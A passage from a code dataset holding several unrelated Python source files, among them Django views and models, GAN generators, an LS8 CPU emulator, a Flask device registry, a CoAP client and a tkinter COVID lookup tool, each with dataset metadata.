super().form_valid(form)\n\n def get_success_url(self):\n id = self.object.id\n return reverse_lazy('postdetail', kwargs={'pk': id})\n\n\nclass PostDeleteView(DeleteView):\n model = Post\n template_name = 'blog/postdelete.html'\n\n def get_success_url(self):\n id = self.object.id\n messages.success(self.request, 'Deleted successfully')\n return reverse_lazy('postlist')\n","sub_path":"blog_website/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"490561746","text":"# Create a function that takes a list as a parameter,\n# and returns a new list with every odd number from the orignal list\n# example: [1, 2, 3, 4, 5] should produce [1, 3, 5]\n\n# print(odd_filter([1, 2, 3, 4, 5])) # should print [1, 3, 5]\n\nlist_of_number = [1, 2, 3, 6, 8, 9, 11]\nodd_number = []\n\ndef odd_filter():\n number = 0 \n for i in list_of_number:\n if not i % 2 == 0:\n odd_number.append(i)\n i += 1\n print(odd_number)\n\nodd_filter() \n\n# L = [1, 2, 3, 4, 5, 6, 7]\n# li = []\n# count = 0\n# for i in L:\n# if count % 2 == 1:\n# li.append(i)\n# count += 1 \n# print(li)","sub_path":"oddfilter/odd_filter.py","file_name":"odd_filter.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163107839","text":"import os, time, sys\nimport matplotlib.pyplot as plt\nimport itertools\nimport pickle\nimport imageio\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom torch.autograd import Variable\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader \nimport torch.nn as nn\n\n\n##### DCGAN\ndef normal_init(m, mean, std):\n if isinstance(m, nn.ConvTranspose2d) or isinstance(m, nn.Conv2d):\n m.weight.data.normal_(mean, std)\n m.bias.data.zero_()\n# G(z)\nclass DCGANgenerator(nn.Module):\n # initializers\n def __init__(self, d=128,channel=1):\n super(DCGANgenerator, self).__init__()\n self.deconv1 = nn.ConvTranspose2d(100, d*8, 4, 1, 0)\n self.deconv1_bn = nn.BatchNorm2d(d*8)\n self.deconv2 = nn.ConvTranspose2d(d*8, d*4, 4, 2, 1)\n self.deconv2_bn = nn.BatchNorm2d(d*4)\n self.deconv3 = nn.ConvTranspose2d(d*4, d*2, 4, 2, 1)\n self.deconv3_bn = nn.BatchNorm2d(d*2)\n self.deconv4 = nn.ConvTranspose2d(d*2, d, 4, 2, 1)\n self.deconv4_bn = nn.BatchNorm2d(d)\n self.deconv5 = nn.ConvTranspose2d(d, channel, 4, 2, 1)\n\n # weight_init\n def weight_init(self, mean, std):\n for m in self._modules:\n normal_init(self._modules[m], mean, std)\n\n # forward method\n def forward(self, input):\n # x = F.relu(self.deconv1(input))\n x = F.relu(self.deconv1_bn(self.deconv1(input)))\n x = F.relu(self.deconv2_bn(self.deconv2(x)))\n x = F.relu(self.deconv3_bn(self.deconv3(x)))\n x = F.relu(self.deconv4_bn(self.deconv4(x)))\n x = F.tanh(self.deconv5(x))\n\n return x\n\n\n### channel adjustable DCGAN, multi-gpu\nclass adDCGANGenerator(nn.Module):\n def __init__(self, ngpu,nz,nc,ngf):\n super(adDCGANGenerator, self).__init__()\n self.ngpu = ngpu\n self.nz = nz\n self.nc = nc\n self.ngf = ngf\n self.main = nn.Sequential(\n # input is Z, going into a convolution\n nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0, bias=False),\n nn.BatchNorm2d(ngf * 8),\n nn.ReLU(True),\n # state size. (ngf*8) x 4 x 4\n nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 4),\n nn.ReLU(True),\n # state size. (ngf*4) x 8 x 8\n nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf * 2),\n nn.ReLU(True),\n # state size. (ngf*2) x 16 x 16\n nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ngf),\n nn.ReLU(True),\n # state size. (ngf) x 32 x 32\n nn.ConvTranspose2d(ngf, nc, 4, 2, 1, bias=False),\n nn.Tanh()\n # state size. (nc) x 64 x 64\n )\n\n def forward(self, input):\n if input.is_cuda and self.ngpu > 1:\n output = nn.parallel.data_parallel(self.main, input, range(self.ngpu))\n else:\n output = self.main(input)\n return output\n\n\n\n\n\n###### another DCGAN\nclass DCGANGenerator(nn.Module):\n def __init__(self, input_size, image_channels=1, height=32, length=32, hidden_size=64, blocks=4):\n super(DCGANGenerator, self).__init__()\n self.hidden_size = hidden_size\n self.blocks = blocks\n self.height = height\n self.length = length\n self.mult = 2**blocks\n\n self.initial_linear = nn.Linear(input_size, hidden_size * self.mult * height//self.mult * length//self.mult)\n self.initial_activ = nn.PReLU(hidden_size * self.mult * height//self.mult * length//self.mult)\n self.initial_norm = nn.LayerNorm(hidden_size * self.mult * height//self.mult * length//self.mult)\n\n self.convs = nn.ModuleList([nn.Conv2d(hidden_size * 2 **(blocks - i), hidden_size * 2**(blocks - i - 1), (5, 5), padding=(2, 2)) for i in range(blocks)])\n self.activ = nn.ModuleList([nn.PReLU(hidden_size * 2**(blocks - i - 1)) for i in range(blocks)])\n self.norm = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i - 1), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n\n self.final_conv = nn.Conv2d(hidden_size, image_channels, (5, 5), padding=(2, 2))\n self.final_activ = nn.Tanh()\n\n def forward(self, inputs):\n x = self.initial_linear(inputs)\n x = self.initial_activ(x)\n x = self.initial_norm(x)\n x = x.view(x.shape[0], self.hidden_size * self.mult, self.height//self.mult, self.length//self.mult)\n\n for i in range(self.blocks):\n x = self.convs[i](x)\n x = self.activ[i](x)\n x = self.norm[i](x)\n x = F.upsample(x, scale_factor=2)\n x = self.final_conv(x)\n x = self.final_activ(x)\n return x\n\n\n\n\n##### WGAN-GP\nclass ResNetGenerator(nn.Module):\n def __init__(self, input_size, image_channels=1, height=32, length=32, hidden_size=64, blocks=4):\n super(ResNetGenerator, self).__init__()\n self.hidden_size = hidden_size\n self.blocks = blocks\n self.height = height\n self.length = length\n self.mult = 2**blocks\n\n self.initial_linear = nn.Linear(input_size, hidden_size * self.mult * height//self.mult * length//self.mult)\n self.initial_norm = nn.LayerNorm(hidden_size * self.mult * height//self.mult * length//self.mult)\n self.initial_activ = nn.PReLU(hidden_size * self.mult * height//self.mult * length//self.mult)\n\n self.convs1 = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i\n in range(blocks)])\n self.norm1 = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.activ1 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])\n\n self.convs2 = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i\n in range(blocks)])\n self.norm2 = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.activ2 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])\n\n self.convs3 = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i\n in range(blocks)])\n self.norm3 = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.activ3 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])\n\n self.convs4 = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i), (3, 3), padding=(1, 1)) for i\n in range(blocks)])\n self.norm4 = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.activ4 = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i)) for i in range(blocks)])\n\n self.transitions_conv = nn.ModuleList(\n [nn.Conv2d(hidden_size * 2 ** (blocks - i), hidden_size * 2 ** (blocks - i - 1), (3, 3), padding=(1, 1)) for\n i in range(blocks)])\n self.transitions_norm = nn.ModuleList([nn.LayerNorm(\n [hidden_size * 2 ** (blocks - i - 1), height // (2 ** (blocks - i)), length // (2 ** (blocks - i))]) for i in\n range(blocks)])\n self.transitions_activ = nn.ModuleList([nn.PReLU(hidden_size * 2 ** (blocks - i - 1)) for i in range(blocks)])\n\n self.final_conv = nn.Conv2d(hidden_size, image_channels, (5, 5), padding=(2, 2))\n self.final_activ = nn.Tanh()\n\n def forward(self, inputs):\n x = self.initial_linear(inputs)\n x = self.initial_activ(x)\n x = self.initial_norm(x)\n\n x = x.view(x.shape[0], self.hidden_size * self.mult, self.height//self.mult, self.length//self.mult)\n\n for i in range(self.blocks):\n fx = self.convs1[i](x)\n fx = self.activ1[i](fx)\n fx = self.norm1[i](fx)\n fx = self.convs2[i](fx)\n fx = self.activ2[i](fx)\n fx = self.norm2[i](fx)\n\n x = x + fx\n\n fx = self.convs3[i](x)\n fx = self.activ3[i](fx)\n fx = self.norm3[i](fx)\n fx = self.convs4[i](fx)\n fx = self.activ4[i](fx)\n fx = self.norm4[i](fx)\n\n x = x + fx\n\n x = self.transitions_conv[i](x)\n x = self.transitions_activ[i](x)\n x = self.transitions_norm[i](x)\n x = F.upsample(x, scale_factor=2)\n\n x = self.final_conv(x)\n x = self.final_activ(x)\n\n return x\n","sub_path":"Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":9349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556032019","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 15 16:57:42 2015\n\n@author: he math\n\"\"\"\nfrom sympy import symbols,sqrt,simplify,lambdify \nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef portfolioplot( muf=0.06,mu1=0.14,mu2=0.08,sig1=0.2,sig2=0.15,rho12=0,figsize=None):\n #the first risk asset has higher returns and risk in this function\n w=symbols(\"w\")\n ExpRet=mu2+(mu1-mu2)*w\n Varf=simplify(sig1**2*w**2+sig2**2*(1-w)**2+2*w*(1-w)*rho12*sig1*sig2)\n StdRet=sqrt(Varf)\n #init_printing()\n ExpRet,simplify(StdRet)\n \n meanf= lambdify(w, ExpRet, \"numpy\")\n varf=lambdify(w,Varf,\"numpy\") \n\n #%matplotlib inline\n if figsize is None:\n plt.figure(figsize=(12,8))\n else:\n plt.figure(figsize=figsize)\n \n plt.text(sig1,mu1*1.02,\"$R_1$\")\n plt.text(sig2,mu2*0.95,\"$R_2$\")\n \n wmin=float(-Varf.coeff(w,1)/(2*Varf.coeff(w,2)))\n mx=sqrt(varf(wmin));my=meanf(wmin)\n plt.plot([sig1,sig2,0,mx],[mu1,mu2,muf,my],\"bo\")\n plt.text(mx*1.02,my,\"M (minimum variance portfolio)\",fontsize=15)\n plt.text(0,muf*1.1,\"F\",fontsize=15)\n \n wv=np.linspace(0,wmin,100)\n stdv=np.sqrt(varf(wv))\n meanv=meanf(wv)\n plt.plot(stdv,meanv,\"r-\") \n plt.annotate(\"$w\\in$\"+str([0,round(wmin,3)]), size=15,xy=(stdv[30],meanv[30]),\n xytext=(stdv[30]*1.1,meanv[30]),\n arrowprops=dict(facecolor=\"red\"))\n \n \n wv=np.linspace(wmin,1,100)\n stdv=np.sqrt(varf(wv))\n meanv=meanf(wv)\n plt.plot(stdv,meanv,\"b-\") \n plt.annotate(\"efficient frontier\\n\"+\"$w\\in$\"+str([round(wmin,3),1]), size=15,xy=(stdv[80],meanv[80]),\n xytext=(stdv[80]*0.6,meanv[80]),\n arrowprops=dict(facecolor=\"blue\"))\n \n plt.xlim([-0.01,max(sig1,sig2)*1.1])\n plt.ylim([max(0,muf-0.02)*0.9,max(mu1,mu2)*1.1])\n plt.plot([0,mx],[muf,my],\"b--\")\n plt.plot([0,sig2],[muf,mu2],\"r-.\")\n \n # tangency portfolio\n v1=mu1-muf;v2=mu2-muf;\n Wt=(v1*sig2**2-v2*rho12*sig1*sig2)/(v1*sig2**2+v2*sig1**2-(v1+v2)*rho12*sig1*sig2)\n Tx=sqrt(varf(Wt));Ty=meanf(Wt)\n plt.plot([Tx],[Ty],\"bo\")\n plt.plot([Tx,0],[Ty,muf],\"b--\")\n plt.text(Tx*1.01,Ty*0.93,\"T (tangency portfolio)\\n \"+\"$w=$\"+str(round(Wt,3)),fontsize=15)","sub_path":"DataAnalysisWithPython/scripts/efficentfronter.py","file_name":"efficentfronter.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"405617472","text":"\"\"\"Main point of entrance to the application\"\"\"\nimport sys\n\nfrom .core import session, utils\nfrom .core.settings_manager import get_global_settings\nfrom .cli import argument_parser, commands\n\n\ndef execute_from_command_line(testdir):\n # deactivate .pyc extention file generation\n sys.dont_write_bytecode = True\n sys.path.insert(0, '')\n\n if not utils.is_valid_test_directory(testdir):\n sys.exit('Error: current drectory is not an existing Golem test '\n 'directory; .golem file not found')\n\n # set global values\n session.testdir = testdir\n session.settings = get_global_settings()\n\n parser = argument_parser.get_parser()\n args = parser.parse_args()\n commands.command_dispatcher(args)\n","sub_path":"golem/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161489074","text":"from django.db import models\n\nclass Project(models.Model):\n \"\"\"\n individual projects that I have worked on\n \"\"\"\n\n title = models.CharField(max_length=50)\n url = models.URLField(blank=True)\n description = models.CharField(max_length=500)\n image = models.ImageField(upload_to='projects/')\n hidden = models.BooleanField(default=False)\n\n # determine the order the projects should be shown\n order = models.IntegerField(default=0)\n\n # comma separated field\n tags = models.CharField(max_length=200, blank=True)\n\n class Meta:\n ordering = ['order']\n\n @property\n def tag_list(self):\n \"\"\"\n return a list of the tags from self.tags\n \"\"\"\n return self.tags.split(',')\n\n def __str__(self):\n return self.title\n","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"422508036","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self, filename):\n \"\"\"Construct a new CPU.\"\"\"\n self.reg = [0] * 256\n self.ram = [0] * 128\n self.filename = filename\n self.stack_pointer = 0xF4\n self.flags = [0] * 8\n def load(self):\n \"\"\"Load a program into memory.\"\"\"\n\n address = 0\n\n with open(self.filename, 'r') as f:\n program = f.read().splitlines()\n program = ['0b'+line[:8] for line in program if line and line[0] in ['0', '1']]\n\n\n for instruction in program:\n self.ram[address] = eval(instruction)\n address += 1\n\n # print(self.ram)\n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n\n if op == \"ADD\":\n self.reg[reg_a] += self.reg[reg_b]\n elif op == \"MUL\":\n self.reg[reg_a] *= self.reg[reg_b]\n elif op == \"CMP\":\n self.flags = [0] * 8\n if self.reg[reg_a] < self.reg[reg_b]:\n self.flags[5] = 1\n elif self.reg[reg_a] == self.reg[reg_b]:\n self.flags[6] = 1\n elif self.reg[reg_a] > self.reg[reg_b]:\n self.flags[7] = 1\n else:\n raise Exception(\"Unsupported ALU operation\")\n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. You might want to call this\n from run() if you need help debugging.\n \"\"\"\n print(\"RAM:\", self.ram)\n print(\"REG:\", self.reg[:10])\n print(\"STACK:\", self.reg[self.stack_pointer:0xF4])\n\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n\n address = 0\n while True:\n instruction = self.ram[address]\n # LDI\n if instruction == 0b10000010:\n register = self.ram[address + 1]\n integer = self.ram[address + 2]\n address += 3\n self.reg[register] = integer\n # PRN\n elif instruction == 0b01000111:\n register = self.ram[address + 1]\n address += 2\n print(self.reg[register])\n # ADD\n elif instruction == 0b10100000:\n self.alu(\"ADD\", self.ram[address + 1], self.ram[address + 2])\n address += 3\n # MUL\n elif instruction == 0b10100010:\n self.alu(\"MUL\", self.ram[address + 1], self.ram[address + 2])\n address += 3\n # PUSH\n elif instruction == 0b01000101:\n register = self.ram[address + 1]\n self.stack_pointer -= 1\n self.reg[self.stack_pointer] = self.reg[register]\n address += 2\n # POP\n elif instruction == 0b01000110:\n register = self.ram[address + 1]\n self.reg[register] = self.reg[self.stack_pointer]\n self.stack_pointer += 1\n address += 2\n # CALL\n elif instruction == 0b01010000:\n self.stack_pointer -= 1\n self.reg[self.stack_pointer] = address + 2\n address = self.reg[self.ram[address + 1]]\n # RET\n elif instruction == 0b00010001:\n address = self.reg[self.stack_pointer]\n self.stack_pointer += 1\n # CMP\n elif instruction == 0b10100111:\n self.alu(\"CMP\", self.ram[address + 1], self.ram[address + 2])\n address += 3\n # JMP\n elif instruction == 0b01010100:\n address = self.reg[self.ram[address + 1]]\n # JEQ\n elif instruction == 0b01010101:\n if self.flags[6] == 1:\n address = self.reg[self.ram[address + 1]]\n else:\n address += 2\n # JNE\n elif instruction == 0b01010110:\n if self.flags[6] != 1:\n address = self.reg[self.ram[address + 1]]\n else:\n address += 2\n\n # HLT\n elif instruction == 0b00000001:\n break\n\n\n\n\n\n\n else:\n # print(address, 'address')\n # print(instruction)\n raise TypeError(\"That command has not been implemented yet\")\n","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"607623064","text":"from flask import Flask, jsonify, request, render_template\nimport os\nimport db\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html', devices=db.get_devices())\n\n\n@app.route('/get')\ndef get():\n return jsonify(db.get_devices())\n\n\n@app.route('/put')\ndef put():\n db.add_device(request.args.get('id'), request.args.get('ip'))\n return jsonify(db.get_devices())\n\n\n@app.route('/clear')\ndef clear():\n db.clear()\n return \"DB Cleared\"\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=5000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"158626891","text":"import copy\nimport html\nfrom dace import data, memlet\nfrom dace.graph import graph as gr, edges\n\n\ndef draw_edge_explicit(srcName, dstName, edge, sdfg, graph, **extraOpts):\n opts = {}\n if isinstance(edge.data, memlet.Memlet):\n if getattr(edge.data, '__label__', False):\n opts[\"label\"] = edge.data.__label__(sdfg, graph)\n else:\n opts[\"label\"] = str(edge.data)\n if edge.data.wcr is not None:\n opts['style'] = 'dashed'\n elif isinstance(edge.data, edges.InterstateEdge):\n opts.update(edge.data.dotOpts)\n # Unhandled properties\n elif edge.data is not None:\n raise ValueError(\"Unhandled edge: \" + str(edge.data))\n if extraOpts:\n opts.update(extraOpts) # Custom options will overwrite default\n\n if isinstance(edge, gr.MultiConnectorEdge):\n sconn = '' if edge.src_conn is None else (':out_' + edge.src_conn)\n dconn = '' if edge.dst_conn is None else (':in_' + edge.dst_conn)\n else:\n sconn = ''\n dconn = ''\n\n return (\"\\\"{}\\\"{sconn} -> \\\"{}\\\"{dconn}\".format(\n srcName, dstName, sconn=sconn, dconn=dconn) + ((\" [\" + \", \".join(\n [\"{}=\\\"{}\\\"\".format(key, value)\n for key, value in opts.items()]) + \"];\") if opts else \";\"))\n\n\ndef draw_edge(sdfg, graph, edge, **extraOpts):\n srcName = 's%d_%d' % (sdfg.node_id(graph), graph.node_id(edge.src))\n dstName = 's%d_%d' % (sdfg.node_id(graph), graph.node_id(edge.dst))\n return draw_edge_explicit(srcName, dstName, edge, sdfg, graph)\n\n\ndef draw_interstate_edge(sdfg, src_graph, dst_graph, edge, **extraOpts):\n srcName = 's%d_%d' % (sdfg.node_id(src_graph), src_graph.node_id(edge.src))\n dstName = 's%d_%d' % (sdfg.node_id(dst_graph), dst_graph.node_id(edge.dst))\n if isinstance(edge, gr.MultiConnectorEdge):\n if edge.src_conn is not None:\n srcName += '@' + edge.src_conn\n if edge.dst_conn is not None:\n dstName += '@' + edge.dst_conn\n\n return draw_edge_explicit(srcName, dstName, edge, sdfg, src_graph,\n **extraOpts)\n\n\ndef draw_interstate_edge_by_name(srcName, dstName, edge, sdfg, src_graph,\n **extraOpts):\n return draw_edge_explicit(srcName, dstName, edge, sdfg, src_graph,\n **extraOpts)\n\n\ndef draw_node(sdfg, graph, obj, **kwargs):\n name = 's%d_%d' % (sdfg.node_id(graph), graph.node_id(obj))\n if getattr(obj, '__label__', False):\n opts = {\"label\": obj.__label__(sdfg, graph)}\n else:\n opts = {\"label\": str(obj)}\n opts.update(kwargs)\n opts[\"label\"] = \"\\\"{}\\\"\".format(opts[\"label\"])\n\n if 'fillcolor' not in opts:\n opts['fillcolor'] = '\"#ffffff\"'\n if 'style' not in opts:\n opts['style'] = 'filled'\n else:\n opts['style'] = '\"filled,%s\"' % opts['style']\n\n ############################################\n if getattr(obj, 'in_connectors', False) != False and len(\n obj.in_connectors) + len(obj.out_connectors) > 0:\n # Header\n code = '{name} [label=<'\n code = code.format(name=name)\n # Input connectors\n code += ''\n\n # Contents\n html_label = html.escape(opts['label'][1:-1])\n code += ''.format(\n label=html_label)\n\n # Output connectors\n code += ''\n\n # Footer\n code += '
'\n code += ''\n connector_code = []\n for conn in sorted(obj.in_connectors):\n connector_code.append(\n ''\n .format(conn=conn))\n code += ''.join(connector_code)\n code += '
{conn}
{label}
'\n code += ''\n connector_code = []\n for conn in sorted(obj.out_connectors):\n connector_code.append(\n ''\n .format(conn=conn))\n code += ''.join(connector_code)\n code += '
{conn}
>'\n\n filtered_opts = {k: v for k, v in opts.items() if k != 'label'}\n if len(filtered_opts.items()) > 0:\n ostr = \", \".join([\n str(key) + \"=\" + str(val)\n for key, val in filtered_opts.items()\n ])\n code += ', ' + ostr\n code += '];\\n'\n\n return code\n ############################################\n\n return \"\\\"{}\\\" [{}];\".format(\n name,\n \", \".join([str(key) + \"=\" + str(val) for key, val in opts.items()]))\n\n\ndef draw_invisible_node(name, **kwargs):\n opts = dict(label='\\\"\\\"', style=\"invisible\")\n opts.update(kwargs)\n return \"\\\"{}\\\" [{}];\".format(\n name,\n \", \".join([str(key) + \"=\" + str(val) for key, val in opts.items()]))\n\n\ndef draw_graph(sdfg, graph, standalone=True):\n \"\"\" Creates a graphviz dot file from a networkx graph input.\n\n If standalone is set, return a full dot string including header and footer.\n \"\"\"\n state_id = sdfg.node_id(graph)\n sdfg = copy.deepcopy(sdfg)\n graph = sdfg.nodes()[state_id]\n\n sdict = graph.scope_dict()\n sdict_children = graph.scope_dict(True)\n\n # Omit collapsed nodes out of nodes to draw\n def is_collapsed(node):\n scope = sdict[node]\n while scope is not None:\n if scope.is_collapsed:\n return True\n scope = sdict[scope]\n return False\n\n nodes_to_draw = set(node for node in graph.nodes()\n if not is_collapsed(node))\n\n # Collect edges to draw for collapsed nodes (we also need edges coming out of scope exits)\n nodes_for_edges = set()\n nodes_for_edges.update(nodes_to_draw)\n\n def add_exit_nodes(scope):\n for node in sdict_children[scope]:\n if node in sdict_children and node.is_collapsed:\n nodes_for_edges.add(graph.exit_nodes(node)[0])\n elif node in sdict_children:\n add_exit_nodes(node)\n\n add_exit_nodes(None)\n\n edges_to_draw = set(\n e for e in graph.edges()\n if e.src in nodes_for_edges and e.dst in nodes_for_edges)\n\n # Take care of scope entry connectors\n for node in nodes_to_draw:\n if node in sdict_children and node.is_collapsed:\n node._out_connectors.clear()\n\n # Take care of scope exit edges and connectors\n for e in edges_to_draw:\n if e.src in nodes_for_edges and e.src not in nodes_to_draw:\n newsrc = sdict[e.src]\n if newsrc is None:\n continue\n e._src = newsrc\n newsrc._out_connectors.add(e.src_conn)\n\n nodes = []\n\n def draw_recursive(toplevel):\n for node in sdict_children[toplevel]:\n if node not in nodes_to_draw: continue\n if node in sdict_children:\n name = 's%d_%d' % (sdfg.node_id(graph), graph.node_id(node))\n nodes.append('''\nsubgraph cluster_%s {\n label = \"\";\n ''' % name)\n nodes.append(node.draw_node(sdfg, graph))\n draw_recursive(node)\n nodes.append('}\\n')\n else:\n nodes.append(node.draw_node(sdfg, graph))\n\n draw_recursive(None)\n #nodes = [x.draw_node(sdfg, graph) for x in nodes_to_draw]\n edges = [draw_edge(sdfg, graph, e) for e in edges_to_draw]\n\n if not standalone:\n return nodes, edges\n\n return \"digraph DaCe {{\\n {}\\n}}\".format(\"\\n \".join(nodes + edges))\n","sub_path":"dace/graph/dot.py","file_name":"dot.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"642284147","text":"from coapthon.client.helperclient import HelperClient\r\n\r\nhost = \"192.168.137.215\"\r\nport = 5683\r\npath_basic =\"basic\"\r\npath_observe = 'observe'\r\n\r\ndef OnReceiptionOfOserve(response):\r\n print(\"observe callback\")\r\n print(response.pretty_print())\r\n\r\n\r\nclient = HelperClient(server=(host, port))\r\nresponse = client.get(path_basic)\r\nprint(response.pretty_print())\r\n\r\nobserve = client.observe(path_observe, callback=OnReceiptionOfOserve)","sub_path":"week-11/Coap_client.py","file_name":"Coap_client.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"446279691","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 21 14:40:27 2019\n\n@author: Asuspc\n\"\"\"\n\nimport docx\nimport StyleProt1\nfrom StyleProt1 import Style,Titre1, Titre2, Titre3, TexteGris, TexteGrisJustif\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH, WD_UNDERLINE, WD_LINE_SPACING, WD_COLOR_INDEX, WD_BREAK\nfrom docx.enum.style import WD_STYLE_TYPE\nfrom docx.shared import Cm, Pt, RGBColor, Inches\n\n#MEMO POUR ECRIRE LES TITRES :\n# Titre1('num + texte du protocole',document)\n# Titre2('num + texte du protocole',document)\n# Titre3('numero','texte',document)\n# TexteGris(texte,document)\n# TexteGrisJustif(texte,document)\n\ndef Partie8(document):\n 'Creation de la partie 8 du protcole de catégorie 1'\n # document = docx.Document()\n\n\n# Marge de la page\n sections = document.sections\n for section in sections:\n section.top_margin = Cm(2)\n section.bottom_margin = Cm(2)\n section.left_margin = Cm(2)\n section.right_margin = Cm(2)\n\n#---------------------------DEFINITIONS DES STYLES\n \n\n # Style(document)\n\n\n# \n#---------------------------------------------------------------ECRITURE\n \n \n #ecriture du premier titre \n Titre1('8\tTRAITEMENTS ET PROCEDURES ASSOCIE(E)S ',document)\n\n # Ecriture du 8.1 \n Titre2('8.1\tTraitements / procédures associé(e)s autorisés',document)\n \n #Ecriture du titre 8.1.1\n Titre3('8.1.1','Médicaments auxiliaires',document)\n \n p=document.add_paragraph()\n p.alignment=WD_ALIGN_PARAGRAPH.JUSTIFY\n run1=p.add_run('Médicament auxiliaire: médicament utilisé pour les besoins d\\'un essai clinique conformément au protocole, mais non comme médicament expérimental (article 2 du règlement européen).')\n run1.style='Paragraphe'\n \n #Ecriture du titre 8.1.2\n Titre3('8.1.2','Autres traitements / procédures',document)\n \n #Titre 8.2\n Titre2('8.2\tTraitements / Procédures associé(e)s interdit(e)s',document)\n \n #Titre 8.3\n Titre2('8.3\tInteractions médicamenteuses',document)\n \n #FIN DU DOC \n paragraph = document.add_paragraph()\n run = paragraph.add_run()\n run.add_break(WD_BREAK.PAGE)\n #document.save(\"Partie7.docx\") \n \n # document.save(\"Partie8.docx\")\n \n ","sub_path":"Partie8.py","file_name":"Partie8.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"429532242","text":"from tkinter import *\r\nimport tkinter.messagebox\r\n \r\n #user interface\r\nclass MainWindow:\r\n def __init__(self):\r\n self.frame = Tk()\r\n \r\n self.label_name = Label(self.frame,text = \"country name\")\r\n self.input_name = Entry()\r\n self.label_name.grid(row = 0,column = 0)\r\n \r\n self.button_search = Button(self.frame,text = \"Search\",width = 10)\r\n self.button_search.bind(\"\",self.buttonListener1)\r\n \r\n self.input_name.grid(row = 0,column = 1)\r\n self.button_search.grid(row = 3,column = 0)\r\n \r\n self.frame.mainloop()\r\n\r\n ##searching bottom\r\n def buttonListener1(self,event):\r\n name = self.input_name.get()\r\n result = search(name)\r\n if result==False:\r\n tkinter.messagebox.showinfo(\"Report\",\"This country is not on the list\")\r\n else:\r\n tkinter.messagebox.showinfo(\"Report\",\"Data in \"+result[0]+\" is:\\n\"+\"Total Case: \"+result[1]+\"\\n\"+\"New Case: \"+result[2]+\"\\n\"+\"Total Deaths: \"+result[3]+\"\\n\"+\"Total Recovered: \"+result[4]+\"\\n\"+\"Avtive Cases: \"+result[5]+\"\\n\")\r\n if result[6]==False:\r\n tkinter.messagebox.showinfo(\"Report\",\"This country does not have 